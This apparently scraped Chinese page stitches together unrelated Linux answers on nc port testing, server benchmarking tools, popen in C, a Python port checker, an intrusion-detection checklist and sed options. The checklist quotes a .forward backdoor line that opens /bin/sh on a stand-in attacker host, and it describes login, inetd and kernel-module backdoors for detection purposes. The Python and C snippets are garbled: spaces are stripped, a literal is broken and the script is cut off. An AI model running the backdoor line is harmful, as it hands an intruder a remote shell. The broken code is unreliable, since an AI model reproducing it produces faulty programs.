linuxstream测试

1. 如何在linux环境下测试端口的连通性

方法/步骤

• 这个需要Linux服务器里边支持nc命令，如果还没有装的情况会显示如下
  

• 我们可专以使用yum命令直接安装，属我的是Centos 6.5系统

• 如果不会用，直接打nc命令就会显示出它的使用方发。
  

• 如果需要测试某个服务器的端口在能不能正常在外面 访问
  

• 例如我测试一下 180.97.33.107 这个IP 的80 端口有没有开启可以使用命令
  nc -z -w 1 180.97.33.107 80
  

• 可以看到默认是使用TCP进行测试的，如果要测试UDP端口有没有开放的可以添加-u 一起使用。例如我测试一下202.96.128.86 这个IP的UDP 53端口
  nc -u -z -w 1 202.96.128.86 53
  

• 上面可以看到成功的会显示相关的信息，但是如果测试到端口是不开放的或者被防火墙拦截的就不会返回相关的信息。

2. 服务器硬件测试教程

1概述
1.1背景
本文的编写背景是目前机房服务器资源存在未充分使用的现象，为了合理分
配资源，现需要对服务器自身性能进行评估，探索一套评估方法，从而为后续资源合理分配提供依据。
1.2评测指标
简单来说，服务器硬件性能指标来自于测试对象，一般x86服务器的主要组
成有CPU、内存、硬盘、网卡等。针对单机，评测指标重点关注CPU、内存、IO、网络；对于集群，重点关注网络、高可用。
本文主要评测单机性能，指标如下：
CPU—计算能力
内存—延时、速率
IO—读写能力
网络—网络带宽
1.3工具概况
CPU主流评测工具有Linux平台的SPECCPU、linpack，Windows平台的Sandra。
内存主流评测工具有Linux平台的stream，Windows平台的Sandra。
IO主流评测工具有Linux平台的Iozone，Windows平台的Iometer。
网络主流评测工具有Linux平台的iperf、netperf。
其他一些对整体系统进行评测的工具就不再介绍了，例如SPEC系列、TPC基准系列。
2 CPU性能
2.1评测方法
关于Linux测试cpu性能，有3个重要的概念：上下文切换（context switchs），运行队列（Run queue）和使用率（utilization）。
业务运行中最关注的CPU项就是使用率，使用率是和业务负载强相关的，通常可以通过监控软件或Linux系统工具获取。
另一个基本评测值就是计算能力，包括整数、浮点计算，可以使用SPECCPU、linpack测试。
2.2评测工具
CPU使用率是平时最关注的性能项，采用系统工具或第三方工具都可以。具体工具不再详述。
CPU整数、浮点计算能力，是服务器发布必测项，但是对于客户却不太重要，客户关注的是业务运行时CPU的能力是否会成为瓶颈。评测工具主要有SPECCPU2006、Linpack：
SPEC CPU 2006包括了CINT2006和C FP2006两个子项目，前者用于测量和对比整数性能，而后者则用于测量和对比浮点性能，SPEC CPU 2006包括了12项整数运算和17项浮点运算。
Linpack现在在国际上已经成为最流行的用于测试高性能计算机系统浮点性能的benchmark。通过利用高性能计算机，用高斯消元法求解N元一次稠密线性代数方程组的测试，评价高性能计算机的浮点性能，测试结果以浮点运算每秒（Flops）给出。
3 内存性能
3.1评测方法
内存性能一般关注的指标是延时、带宽，测试方法有Windows下使用Sandra，Linux使用stream进行评测，可以得到当前内存的实际速率、延时。这是单独针对内存的测试方法，但在实际应用中通常对内存的评测是在压力、稳定性、性能测试时的监测内存的使用。
3.2评测工具
STREAM是业界广为流行的综合性内存带宽实际性能测量工具之一。随着处理器处理核心数量的增多，内存带宽对于提升整个系统性能越发重要，如果某个系统不能够足够迅速地将内存中的数据传输到处理器当中，若干处理核心就会处于等待数据的闲置状态，而这其中所产生的闲置时间不仅会降低系统的效率还会抵消多核心和高主频所带来的性能提升因素。STREAM具有良好的空间局部性，是对TLB友好、Cache友好的一款测试。STREAM支持Copy 、Scale 、 Add、 Triad四种操作。
4 IO性能
4.1评测方法
服务器的存储性能也就是指IO性能，通常评测的重点是各种数据块(512B、4K、2M…)下的读写能力，具体指标有IOPS、带宽、时延。测试原理是工具对存储加压也就是产生各种读写操作来测试整个IO的最大能力。
4.2评测工具
Iometer是Windows系统下对存储子系统的读写性能进行测试的软件。可以显示磁盘系统的最大IO能力、磁盘系统的最大吞吐量、CPU使用率、错误信息等。用户可以通过设置不同的测试的参数，有存取类型(如sequential ,random)、读写块大小(如64K、256K)，队列深度等，来模拟实际应用的读写环境进行测试。
IOzone主要用来测试操作系统文件系统性能的测试工具，该工具所测试的范围主要有，write , Re-write, Read, Re-Read, Random Read, Random Write, Random Mix, Backwards Read, Record Rewrite, Strided Read, Fwrite, Frewrite, Fread, Freread, Mmap, Async I/O。使用iozone可以在多线程、多cpu，并指定cpu cache空间大小以及同步或异步I/O读写模式的情况下进行测试文件操作性能。
5 网络性能
5.1评测方法
网络带宽不难理解，就是系统收发包时的最大流量，一般分为TCP、UDP两种模式。影响服务器网络性能主要是网卡的性能，其他如系统内核、驱动也是相关因素。测试方法一般需要2台服务器进行收发包，一端server，一端client。
5.2评测工具
Iperf是一个网络性能测试工具。Iperf可以测试TCP和UDP带宽质量。Iperf可以测量最大TCP带宽，具有多种参数和UDP特性。Iperf可以报告带宽，延迟抖动和数据包丢失。利用Iperf这一特性，可以用来测试一些网络设备如路由器，防火墙，交换机等的性能。
Netperf是一种网络性能的测量工具，主要针对基于TCP或UDP的传输。
Netperf根据应用的不同，可以进行不同模式的网络性能测试，即批量数据传输（bulk data transfer）模式和请求/应答（request/reponse）模式。Netperf测试结果所反映的是一个系统能够以多快的速度向另外一个系统发送数据，以及另外一个系统能够以多快的速度接收数据。

3. 在Linux中，stream是什么意思

stream是数据流的意思.
具体的定义我也不能说得很清楚.
大概指的是连续的数据信息,而只有少数的区别,好象主要是在地址上有点区别,在处理上应该可以用同一个函数进行处理.

4. linux 下如何编写c程序，获得命令行结果

void executeShell(const char *shell){

FILE *stream;

char buf[1024];

memset( buf, '', sizeof(buf) );//初始化buf,以免后面写如乱码到文件中

stream = popen( shell , "r" ); //将命令的输出 通过管道读取（“r”参数）到FILE* stream

fread( buf, sizeof(char), sizeof(buf), stream); //将刚刚FILE* stream的数据流读取到buf中

pclose( stream );

printf("%s ",buf);//打印输出结果

}

5. Linux下，不用telnet命令，还有别的命令可以测试端口是否开放吗

可以用python的socket模块，比telnet快多了。下面是我测试过的代码，楼主可以参考一下：

#!/usr/local/bin/python

#nameIsOpen.py

importos

importsys

importsocket

#firstargument

host=sys.argv[1]

#secondargument

port=int(sys.argv[2])

#sockettryconnect

defIsOpen(ip,port):

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:

s.connect((ip,port))

s.shutdown(2)

print('IP%s,port%disopen'%(ip,port))

returnTrue

except:

print('IP%s,port%disdown'%(ip,port))

returnFalse

if__name__=='__main__':

6. Linux服务器是否被攻击怎么判断

1、检查系统密码文件

首先从明显的入手，查看一下passwd文件，ls –l /etc/passwd查看文件修改的日期。

检查一下passwd文件中有哪些特权用户，系统中uid为0的用户都会被显示出来。

1

awk –F:’$3==0{print$1}’/etc/passwd

顺便再检查一下系统里有没有空口令帐户：

1

awk –F: ‘length($2)==0{print$1}’/etc/shadow

2、查看一下进程，看看有没有奇怪的进程

重点查看进程：ps –aef | grep inetd

inetd是UNIX系统的守护进程，正常的inetd的pid都比较靠前，如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程，着重看inetd –s后面的内容。在正常情况下，LINUX系统中的inetd服务后面是没有-s参数的，当然也没有用inetd去启动某个文件；而solaris系统中也仅仅是inetd –s，同样没有用inetd去启动某个特定的文件；如果你使用ps命令看到inetd启动了某个文件，而你自己又没有用inetd启动这个文件，那就说明已经有人入侵了你的系统，并且以root权限起了一个简单的后门。

输入ps –aef 查看输出信息，尤其注意有没有以./xxx开头的进程。一旦发现异样的进程，经检查为入侵者留下的后门程序，立即运行kill –9 pid 开杀死该进程，然后再运行ps –aef查看该进程是否被杀死；一旦此类进程出现杀死以后又重新启动的现象，则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找：find / -name 程序名 –print，假设系统真的被入侵者放置了后门，根据找到的程序所在的目录，会找到很多有趣的东东J

UNIX下隐藏进程有的时候通过替换ps文件来做，检测这种方法涉及到检查文件完整性，稍后我们再讨论这种方法。

接下来根据找到入侵者在服务器上的文件目录，一步一步进行追踪。

3、检查系统守护进程

检查/etc/inetd.conf文件，输入：cat /etc/inetd.conf | grep –v “^#”，输出的信息就是你这台机器所开启的远程服务。

一般入侵者可以通过直接替换in.xxx程序来创建一个后门，比如用/bin/sh 替换掉in.telnetd，然后重新启动inetd服务，那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。

4、检查网络连接和监听端口

输入netstat -an，列出本机所有的连接和监听的端口，查看有没有非法连接。

输入netstat –rn，查看本机的路由、网关设置是否正确。

输入 ifconfig –a，查看网卡设置。

5、检查系统日志

命令last | more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程，这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog，查看系统syslog进程的情况，判断syslog上次启动的时间是否正常，因为syslog是以root身份执行的，如果发现syslog被非法动过，那说明有重大的入侵事件。

在linux下输入ls –al /var/log

在solaris下输入 ls –al /var/adm

检查wtmp utmp，包括messgae等文件的完整性和修改时间是否正常，这也是手工擦除入侵痕迹的一种方法。

6、检查系统中的core文件

通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法，典型的RPC攻击就是通过这种方式。这种方式有一定的成功率，也就是说它并不能100%保证成功入侵系统，而且通常会在服务器相应目录下产生core文件，全局查找系统中的core文件，输入find / -name core –exec ls –l {} ; 依据core所在的目录、查询core文件来判断是否有入侵行为。

7、.rhosts和.forward

这是两种比较著名的后门文件，如果想检查你的系统是否被入侵者安装了后门，不妨全局查找这两个文件：

find / -name “.rhosts” –print

find / -name “.forward” –print

在某用户的$HOME下，.rhosts文件中仅包含两个+号是非常危险的，如果你的系统上开了513端口（rlogin端口，和telnet作用相同），那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证。

看到这里如果想要深入的做安全加固服务以及安全部署

就必须找专业做服务器的安全公司来处理了国内也就Sine安全和绿盟比较专业提供。

Unix下在.forward文件里放入命令是重新获得访问的常用方法在某一 用户$HOME下的.forward可能设置如下:

username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或procmail类程序, 很有可能还有问题。在Solaris系统下，如果你运行如下命令：

ln -s /var/mail/luser ~/.forward

然后设置vacation有效，那么/var/mail/luser就会被拷贝到~/.forward，同时会附加"|/usr/bin/vacation me"，旧的symlink被移到~/.forward..BACKUP中。

直接删除掉这两个文件也可以。

8、检查系统文件完整性

检查文件的完整性有多种方法，通常我们通过输入ls –l 文件名来查询和比较文件，这种方法虽然简单，但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询，国家查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多，这里不一一赘述，可以man rpm来获得更多的格式。

UNIX系统中，/bin/login是被入侵者经常替换作为后门的文件，接下来谈一下login后门 ：

UNIX里，Login程序通常用来对telnet来的用户进行口令验证。入侵者获取login的源代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令，它将忽视管理员设置的口令让你长驱直入：这将允许入侵者进入任何账号，甚至是root目录。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问，所以入侵者可以登录获取shell却不会暴露该账号。管理员注意到这种后门后，使用”strings”命令搜索login程序以寻找文本信息。许多情况下后门口令会原形毕露。入侵者又会开始加密或者更改隐藏口令，使strings命令失效。所以许多管理员利用MD5校验和检测这种后门。UNIX系统中有md5sum命令，输入md5sum 文件名检查该文件的md5签名。它的使用格式如下：md5sum –b 使用二进制方式阅读文件；md5sum –c 逆向检查MD5签名；md5sum –t 使用文本方式阅读文件。

在前面提到过守护进程，对于守护进程配置文件inetd.conf中没有被注释掉的行要进行仔细比较，举个简单的例子，如果你开放了telnet服务，守护进程配置文件中就会有一句：telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd，检查该文件的完整性，入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门。

LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件，检查该文件的完整性，可以直接cat /etc/crontab，仔细阅读该文件有没有被入侵者利用来做其他的事情。

不替换login等文件而直接使用进程来启动后门的方法有一个缺陷，即系统一旦重新启动，这个进程就被杀死了，所以得让这个后门在系统启动的时候也启动起来。通常通过检查/etc/rc.d下的文件来查看系统启动的时候是不是带有后门程序；这个方法怎么有点象查windows下的trojan？

说到这里，另外提一下，如果在某一目录下发现有属性为这样的文件：-rwsr-xr-x 1 root root xxx .sh，这个表明任何用户进来以后运行这个文件都可以获得一个rootshell，这就是setuid文件。运行 find –perm 4000 –print对此类文件进行全局查找，然后删除这样的文件。

9、检查内核级后门

如果你的系统被人安装了这种后门，通常都是比较讨厌的，我常常就在想，遇到这种情况还是重新安装系统算了J，言归正传，首先，检查系统加载的模块，在LINUX系统下使用lsmod命令，在solaris系统下使用modinfo命令来查看。这里需要说明的是，一般默认安装的LINUX加载的模块都比较少，通常就是网卡的驱动；而solaris下就很多，没别的办法，只有一条一条地去分析。对内核进行加固后，应禁止插入或删除模块，从而保护系统的安全，否则入侵者将有可能再次对系统调用进行替换。我们可以通过替换create_mole()和delete_mole()来达到上述目的。另外，对这个内核进行加固模块时应尽早进行，以防系统调用已经被入侵者替换。如果系统被加载了后门模块，但是在模块列表/proc/mole里又看不到它们，有可能是使用了hack工具来移除加载的模块，大名鼎鼎的knark工具包就有移除加载模块的工具。出现这种情况，需要仔细查找/proc目录，根据查找到的文件和经验来判断被隐藏和伪装的进程。Knark后门模块就在/proc/knark目录，当然可能这个目录是隐藏的。

7. Linux中的sed是什么意思呢，如何使用呢

Sed是一项Linux指令，全称是Stream
EDitor，功能同awk类似，差别在于，sed简单，对列处理的功能要差一些，awk的功能复杂，对列处理的功能比较强大。Sed主要用于自动编辑一个或者多个文件，多用于脚本中对文件的处理。
Sed命令可以对文件进行增加、删除、修改和查找操作，所以学好sed命令是写自动化脚本必须的基础之一。
调用sed命令有两种形式：
sed [options] 'command' file(s)
sed [options] -f scriptfile file(s)
sed命令主要选项
-e command,--expression=command允许多台编辑。
-h,--help打印帮助，并显示bug列表的地址。
-n,--quiet,--silent取消默认输出。
-f,--filer=script-file引导sed脚本文件名。
-V,--version打印版本和版权信息。
命令：
a\在当前行后面加入一行文本。
b label分支到脚本中带有标记的地方，如果分支不存在则分支到脚本的末尾。
c\用新的文本改变本行的文本。
d 从模板块位置删除行。
D 删除模板块的第一行。
i\在当前行上面插入文本。
h拷贝模板块的内容到内存中的缓冲区。
H 追加模板块的内容到内存中的缓冲区。
g 获得内存缓冲区的内容，并替代当前模板块中的文本。
G 获得内存缓冲区的内容，并追加到当前模板块文本的后面。
l 列表不能打印字符的清单。
n 读取下一个输入行，用下一个命令处理新的行而不是用第一个命令。
N 追加下一个输入行到模板块后面并在二者间嵌入一个新行，改变当前行号码。
p 打印模板块的行。
P 打印模板块的第一行。
q 退出Sed。
r file从file中读行。
t labelif分支，从最后一行开始，条件一旦满足或者T，t命令，将导致分支到带有标号的命令处，或者到脚本的末尾。
T label错误分支，从最后一行开始，一旦发生错误或者T，t命令，将导致分支到带有标号的命令处，或者到脚本的末尾。
w file写并追加模板块到file末尾。
W file写并追加模板块的第一行到file末尾。
! 表示后面的命令对所有没有被选定的行发生作用。
s/re/string 用string替换正则表达式re。
= 打印当前行号码。
# 把注释扩展到下一个换行符以前。